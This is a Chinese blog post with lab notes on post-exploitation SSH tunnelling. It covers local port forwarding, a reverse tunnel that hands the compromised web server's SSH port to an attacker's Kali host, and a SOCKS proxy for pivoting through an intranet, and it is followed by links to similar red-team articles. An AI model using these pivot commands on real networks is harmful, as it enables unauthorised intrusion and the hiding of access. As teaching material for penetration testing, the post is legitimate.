20210427web渗透学习之内网渗透SSH隧道

已于 2022-04-24 17:23:35 修改
阅读量313 收藏
点赞数
分类专栏: WEB渗透学习 文章标签: linux web 网络
于 2021-04-30 23:26:35 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45290991/article/details/116208562
版权

 

 欢迎大家一起来Hacking水友攻防实验室学习,渗透测试,代码审计,免杀逆向,实战分享,靶场靶机,求关注

今天又是很累很累的一天,又是训练什么的,气死我了。真的希望这种官僚主义能够狗带!先上拓扑图:

话不多说,我之前学到了提权那里,也就意味着,我们已经有了一台内网主机的root权限,这个时候,我们往往想着能攻下整个内网。也就是扩大战果。但是这需要做很多提前准备工作。。。。比如ssh隧道。

 一、SSH正向连接

我们在web服务器端输入:ssh –CNfL 0.0.0.0:7777:10.10.10.128:80 (web服务器当前用户,eg:xyy)@192.168.0.144(当前web服务器ip)

这条命令的意思是是:-C:压缩传输数据     N:带端口转发   f:在执行命令前退回后台,不容易被入侵者发现吧我想    L:主机:端口:主机端口 将本地机(客户机)的某个端口转发到远端指定机器的指定端口. 工作原理是这样的, 本地机器上分配了一个 socket 侦听 port 端口, 一旦这个端口上有了连接, 该连接就经过安全通道转发出去, 同时远程主机和 host 的 hostport 端口建立连接. 可以在配置文件中指定端口的转发. 只有 root 才能转发特权端口. IPv6 地址用另一种格式说明: port/host/hostport

把web服务器的7777端口和目标数据服务器(公网ip10.10.10.128)的80端口映射,相当于在这两个地方建立了一个ssh隧道。然后在kali黑客的浏览器访问192.168.0.144:7777。即可。

二、SSH反向连接(较为常用)

ssh -qTfnN -R port:host:hostport  remote_ip

ssh –qTfnN –R 2222:127.0.0.1:22  (攻击机的用户)@192.168.0.115

ssh –p 2222 (主动去连接攻击机的web服务器,这台机子的用户(也就是web服务器的用户))@127.0.0.1

-q:quit,静音模式,去除警告信息    -T:禁止分伪终端  -R 反向连接getshell,反弹shell   以上命令的意思是:本机的2222端口,经ssh通道主动反弹一个shell给kali的root用户的22端口

但是!!!!!

需要注意的是,两台建立ssh通道的机子必须都开放ssh服务, etc/init.d/ssh start

这里你可能会问?为何正向连接只需要输入一个密码,但是反向连接却需要两个用户都……可以参考ssh的连接方式中密钥的2种交换方式:https://zhuanlan.zhihu.com/p/46235721  

其中OpenSSL这个方式可以了解一下,貌似打靶机时候用得到。

三、SSL代理

SSH -qTfnN -D port remotehost

原理如上图,试想,如果吧web服务器当做黑客的代理会如何???整个内网岂不是都沦陷了??哈哈哈哈

热热的雨夜
关注
专栏目录
红队内网攻防渗透内网渗透之内网对抗:隧道技术篇&防火墙组策略&HTTP反向&SSH转发&出网穿透&CrossC2&解决方案
HACKONE的博客
06-21 404
这里是将端口映射到了本地端口,也就是开启冰蝎的这台机器,直接访问本地的2222端口就能访问2.22的80。如:模拟Windows为被控机,配置防火墙策略:SSH 22端口放行。内网主机防火墙限制了出网协议,可以利用SSH转发流量实现内网穿透。太多时候遇到目标不出网了,TCP、ICMP、DNS协议均不通,将2.22上80端口流量转发到xx.xx上的1234端口。注:由于CS无SSH协议监听器配置,无法上线。目前版本只支持反向的https和正向的tcp。如:模拟Linux为被控机,配置防火墙策略。
红队内网攻防渗透内网渗透之内网各种工具平台的使用
HACKONE的博客
04-10 281
红队内网攻防渗透内网各种工具平台的使用 内网各种工具平台的使用
内网渗透 SSH隧道
干铮的博客
03-24 679
SSH隧道 SSH会自动加密和解密所有SSH客户端与服务端之间的网络数据。但是,SSH还能够将其他TCP端口的网络数据通过SSH链接来转发,并且自动提供了响应的解密服务。这一过程也被叫做“隧道”(tunneling),这是因为SSH为其他TCP链接提供了一个安全的通道来进行传输而得名,例如SMTP、LDAP这些TCP应用均能够从中得益,避免了用户名,密码以及隐私信息的传输。而此同时,如果工作环境中的防火墙限制了一些网络端口的使用,但是允许SSH的连接,也能够通过将TCP端口转发来使用SSH进行通讯..
内网渗透-SSH隧道
weixin_45427778的博客
08-18 508
内网渗透之——ssh隧道 网络拓扑图: ssh 正向链接: 在web服务器执行 ssh -CNfL 0.0.0.0:7777:10.10.10.128:80 web@127.0.0.1 在web服务器做端口映射,将数据服务器的80端口映射到web服务器的7777端口,随后访问192.168.0.144:7777即可访问到数据库的80页面。 反向连接: 将web服务器的22端口转发出去到黑客IP web服务器执行: ssh -qTfnN -R 2222:127.0.0.1 root@192.
内网渗透SSH隧道
帅醉了的博客
04-18 674
1.本地转发 ssh -CfNg -L 1153:172.168.172.147:3389 root@172.168.172.146 netstat -tulnp | grep "1153" rdesktop 127.0.0.1:1153 2.远程转发 ssh -CfNg -R 3308:172.168.172.147:3389 root@172.168.172.143 nets...
渗透测试】SSH隧道原理
SunnyCat
01-28 5652
目录一、SSH协议简介二、SSH工作原理三、SSH协议组成四、SSH隧道技术1、本地转发(远程转发到本地-正向代理)2、远程转发(本地转发到远程-反向代理)3、动态转发(socks5代理)五、进阶使用 一、SSH协议简介 SSH(Secure Shell protocol)协议是应用层协议,OpenSSHSSH (Secure SHell)协议的免费开源实现,SSH协议族可以用来进行远程控制,或在计算机之间传送文件。而实现此功能的传统方式,如telnet(终端仿真协议)、 rcp ftp、 rlogin
基于Electron搭建的ssh隧道浏览器主要用于需要通过隧道进行web访问的场景
08-12
基于 `Electron` 搭建的`ssh`隧道浏览器,主要用于需要通过隧道进行 web 访问的场景
红队内网攻防渗透内网渗透之内网对抗:隧道技术篇&防火墙组策略&FRP&NPS&Chisel&Socks代理&端口映射&C2上线
最新发布
HACKONE的博客
06-21 697
目前支持tcp、udp流量转发,可支持任何tcp、udp上层协议(访问内网网站、本地支付接口调试、ssh访问、远程桌面,DNS解析等),此外还支持内网http代理、内网socks5代理、p2p等,并带有功能强大的web管理端。Frp是专注于内网穿透的高性能的反向代理应用,支持TCP、UDP、HTTP、HTTPS等多种协议。服务端-下载-解压-修改-启动(阿里云主机记得修改安全组配置出入口)建立客户端连接服务端后将141上5555给到服务端6666上。服务端启动:frps -c frps.ini。
Web安全之《SSH暴力破解》
ClearLove的博客
08-09 8290
SSH暴力破解》作业 课程名称:《Web安全(一)》 【要求】 概念越详细越好; 验证过程必要有截图和文字说明; 防护措施必须超过6条以上; 其余部分均可配文字简介叙述; 作业模板在此基础上可以自由发挥设计; 熟悉虚拟机的使用,了解渗透测试工具的使用方法和Linux命令 【SSH服务简介描述】 ...
红队内网攻防渗透内网渗透之内网对抗:隧道技术篇&防火墙组策略&ICMP&DNS&SMB协议&出网判断&C2上线&解决方案
HACKONE的博客
06-21 383
ICMP 通过 PING 命令访问远程计算机,建立 ICMP 隧道,将 TCP/UDP 数据封装到 ICMP 的 PING 数据包中,从而穿过防火墙,防火墙一般不会屏蔽 PING 数据包,实现不受限制的访问。添加新的A记录 这里按照C2重新新建一个主机记录将C2.xiaodi8.com指向我们的CS服务器地址。现在成功上线了web,但是要使用web服务器访问2.22的网站访问不了,出站是允许icmp。利用各种隧道技术,以网络防火墙允许的协议,绕过网络防火墙的封锁,实现访问被封锁的目标网络
web渗透测试----5、暴力破解漏洞--(1)SSH密码破解
七天
06-23 890
SSH暴力破解
基于WebSSH终端调研
oneslide
08-13 495
Web-based SSH使得通过浏览器就可以访问SSH Shell终端,通俗来将,使用浏览器代替Xshell之类的客户端工具。有两种实现方式: JavaScript/Ajax或者JavaScript/WebSockets。 基于Web的客户端通常分成两个两个部分: 客户端: JS和动态HTML用于捕获键盘事件,与服务器交换信息。 服务端: 前端请求在web后端处理,键盘事件转发到安全shell客户端与连接的SSH服务器(运行sshd的远程主机)交互。终端输出直接转给客户端(客户端使用JavaScript转
web隧道
zy010101博客
11-09 719
web隧道可以让 HTTP 应用程序访问使用非 HTTP 协议的应用程序。Web 隧道允许用户通过 HTTP 连接发送非 HTTP 流量,这样就可以在 HTTP 上捎带其他协议数据了。使用 Web 隧道最常见的原因就是要在 HTTP 连接中嵌入非 HTTP流量,这样,这类流量就可以穿过只允许 Web 流量通过的防火墙了。
内网渗透之代理转发(1)--认识ssh
azraelxuemo的博客
07-13 430
首先我先初步介绍一下ssh命令的几个参数 -D -D [bind_address:]port 指定本地应用级动态端口转发。它的工作原理是为本地端端口分配一个套接字,可选地绑定到指定的绑定地址。无论何时建立到此端口的连接,该连接都将通过通道转发,然后使用应用程序协议确定从远程计算机连接到何处 这个命令主要用在多级的代理链上或者本地的端口转发,相当于指定了一个端口,只要是来到这个端口的流量,就将自动按照我们的配置进行转发 这里的bind_address一般都是0.0.0.0,127.0.0.1,本地ip地址,
Reverse_SSH:一款基于SSH反向Shell工具
ZL_1618的博客
08-23 239
网络安全行业产业以来,随即新增加了几十个网络安全行业岗位︰网络安全专家、网络安全分析师、安全咨询师、网络安全工程师、安全架构师、安全运维工程师、渗透工程师、信息安全管理员、数据安全工程师、网络安全运营工程师、网络安全应急响应工程师、数据鉴定师、网络安全产品经理、网络安全服务工程师、网络安全培训师、网络安全审计员、威胁情报分析工程师、灾难恢复专业人员、实战攻防专业人员…网上虽然也有很多的学习资源,但基本上都残缺不全的,这是我自己录的网安视频教程,上面路线图的每一个知识点,我都有配套的视频讲解。
访问内网主机--ssh反向穿透+端口转发
sysulzq的博客
05-23 2239
应用场景:由于我们用到的一个控制设备的服务器只能部署在跟设备属于同一个局域网的内网中,所以服务器的IP地址对外是不透明的,并且也没有自己的公网IP,为了实现外部主机对这台内网服务器的访问,需要用到一个具有公网IP的云服务器,这里用的是腾讯云的云主机的ubuntu系统.下面假设一些虚拟的数据来说明一下具体的方法:假设我们的内网主机为主机A,IP为11.11.11.11,用户名:abc假设我们的云服务...
浏览器 ssh隧道_如何使用SSH隧道访问受限服务器和安全浏览
culinxia2707的博客
09-04 2198
浏览器 ssh隧道An SSH client connects to a Secure Shell server, which allows you to run terminal commands as if you were sitting in front of another computer. But an SSH clientalso allows you to “tunnel” a...
ssh隧道详解与案例利用讲解
46的十哥哥的5哥哥
11-22 1057
你是否有过自己身处内网,却想整个远控上线?你是否有过身处目标内网,却想把目标的内网的Linuxssh转发出来?你是否想过穿透多层网络代理?那么,ssh隧道技术你值得学习。 I:SSH隧道是什么 专业一点: SSH隧道是一种通过加密的SSH连接传输任意网络数据的方法。它可用于为遗留应用程序添加加密。它还可用于实现VPN(虚拟专用网络)和跨防火墙访问Intranet服务。原文:https:/...
老戚的黑科技之SSH隧道技术
创意无极限
04-14 2660
隧道顾名思义让不通的地方变通。SSH隧道技术也是同样的道理,借用SSH这个工具,通过SSHClient和SSHServer之间建立一条TCP通道,从而打通二台设备,于此同时分别监听各自的一个端口号,如果端口号复合就把该数据加密并且发到对端,对端解密后根据配置的命令再做出相对应的操作。SSH有正向代理与反向代理之说,下面将分别介绍。...
SSH框架学习实例与Java WEB教程资源
"JAVAWEBSSH框架学习实例大全,包含多个SSH框架相关的学习资源,如MySQL数据库操作、EXT库、jar包、JavaEE的PPT教程、示例项目shoppingCart、ssh2框架实践、增删改查操作、Training课程、Web开发中的ssh框架应用、...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值